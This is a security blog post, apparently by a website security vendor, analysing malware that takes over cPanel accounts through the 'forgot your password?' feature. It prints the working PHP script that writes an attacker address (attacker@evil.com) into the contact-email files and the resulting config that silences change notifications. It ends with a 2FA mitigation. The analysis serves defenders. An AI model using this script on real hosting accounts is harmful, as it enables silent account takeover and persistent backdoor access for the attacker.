There’s no doubt that the ubiquitous “forgot your password?” feature has helped many users who’ve misplaced their password or otherwise forgotten it, however—the tradeoff is that it can result in bugs that help bad actors.
As demonstrated in this article, an attacker can use cPanel’s “forgot your password?” feature to reset a user password and obtain further access to an already compromised website.
Malicious File Used to Access Hosting Environment
One of our analysts discovered a malicious file on a compromised website’s hosting environment. The malware contained a simple method used to change the cPanel user password, which then allows them further access to the hosting plan and its associated websites.
For example, attackers can create an SSH or FTP user once they have gained access to the compromised environment. This means that even after the website is cleaned of all malware and the password is reset, they would still be able to use the new SSH or FTP user to re-upload any malicious content removed during cleanup.
cPanel Password Modification
The problem for attackers is that cPanel’s password hashes are stored in the Linux server /etc/shadow file. By default, this can’t be modified by a malicious file since it would lack the appropriate ownership and permissions.
To successfully modify the password, the attacker needs to be creative and use a different method. One of these methods just so happens to be through changing the contact email address, which is usually accomplished through the cPanel interface after successful authentication.
The issue in this specific “forgot your password?” system is that the contact email address is read from a file within the cPanel user’s directory. Due to its ownership and permissions, it can be readily modified by an attacker using a malicious file.
As you can see from this image, the malicious PHP file is rather basic and simply accepts an input from the user via a submitted POST request.
Updating cPanel Email Addresses
Depending on the cPanel server configuration, the contact’s email address can exist in two different locations: /home/user/.contactemail and /home/user/.cpanel/contactinfo.
Once the username has been obtained via get_current_user();, then the input from the submitted POST request can be written to the two locations of the contact email address file (.contactemail and .cpanel/contactinfo).
$user = get_current_user();
$site = $_SERVER['HTTP_HOST'];$ips = getenv('REMOTE_ADDR');
if(isset($_POST['submit'])){
$email = $_POST['email'];
$wr = 'email:'.$email;
$f = fopen('/home/'.$user.'/.cpanel/contactinfo', 'w');
fwrite($f, $wr);
fclose($f);
$f = fopen('/home/'.$user.'/.contactemail', 'w');
fwrite($f, $wr);
fclose($f);
$parm = $site.':2083/resetpass?start=1';
echo '<br/><center>'.$parm.'</center>';
echo '<br/><center>'.$user.'</center>';This malicious code sample demonstrates how the simple data writes to the necessary contactinfo files.
After successfully running the malicious script above with a configured email address (e.g attacker@evil.com) in the $_POST parameter, the two files .contactemail and .cpanel/contactinfo are updated.
[root@cpanel]# pwd
/home/luke
[root@cpanel]# find . -name "*contact*" | xargs grep -ni "email"
./.contactemail:1:attacker@evil.com
./.cpanel/contactinfo:2:"email": 'attacker@evil.com'
Once the email address has been successfully written into the user files .contactemail and .cpanel/contactinfo, the malicious user simply needs to submit a “forgot your password?” request.
The “forgot your password?” process requires users to access the URL domain.com:2083/resetpass (2083 is the port used for cPanel HTTPS) and provide the cPanel username along with the corresponding cPanel contact email address that we just modified.
After submitting that information, the cPanel server then sends a security code to the contact email address which is used by the attacker to change the cPanel password and directly access the cPanel. Once the attacker has accessed the site, they can easily plant further layers of backdoors (e.g create additional FTP users).
Conclusion & Mitigation Steps
Some of you may be familiar with cPanel’s notification settings, which allow for alerts to be sent in the event of specific setting modifications—like a contact email address or user password change.
At first glance, this feature looks like it could help alert someone in the event of an attacker changing the contact email address. However, this particular alert is only triggered when the change is requested from the cPanel user’s Contact Information page.
When attackers submit modifications to the .cpanel/contactinfo file using the previously shown malware instead, the victim’s initial contact email address will never be alerted. Secondary contact email addresses configured in this manner can also be silently removed during this modification process for the primary contact email address.
"email": 'attacker@evil.com'
"notify_contact_address_change": 0
"notify_contact_address_change_notification_disabled": 0
"notify_password_change": 0
"notify_password_change_notification_disabled": 0
"second_email": ''
This sample shows .cpanel/contactinfo fields that were modified by the attacker, including email address and notification alerts.
I was able to replicate this issue on the latest version of cPanel (v82.0.16 at time of writing). I could not trigger an alert email to be sent to the victim contact email address when the file .cpanel/contactinfo is modified using a function like PHP’s fopen.
For now, the best way for an average user to defend against this type of password reset attack is to enable 2FA authentication for their cPanel account.
If you believe that your website has been compromised, we offer a number of free guides and resources to help you clean up a hacked website.
Our incidence response team is here to help you with any malware removal requests if you need a hand.
Yuliyan Tsvetkov
Denis Sinegubko
Douglas Santos
Luke Leal
Ashley Sand
Liam Smith
Daniel Cid
Bruno Zanelato